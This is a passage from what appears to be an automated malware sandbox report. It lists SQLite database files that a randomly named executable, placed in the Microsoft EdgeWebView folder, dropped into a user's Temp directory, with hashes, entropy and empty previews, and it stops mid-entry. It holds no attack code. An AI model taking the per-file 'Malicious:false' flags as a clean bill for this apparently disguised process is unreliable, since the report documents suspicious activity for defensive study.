                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\SH7mkYUAvo

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\SyvHpB8muA

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\TdLHRb2f5L

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\TmZxR5lRoX

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\TxRoU6pl4e

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Tys7MWLU7H

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\U2olc5dD2M

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\U4ycOKhGrg

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UNOHV95mDw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UPsIVe3YlO

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UQXjLGqyVH

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\USvn8Oy8LL

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UXTSzvx537

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UmPPDT60Hk

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UpQ5Z0QTGq

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UuVHlBmnGm

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\V5flXYixpT

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Vp0KRomMS3

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\VsyP80HcfO

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\WJBmpX4LKa

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Was90vcYGK

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
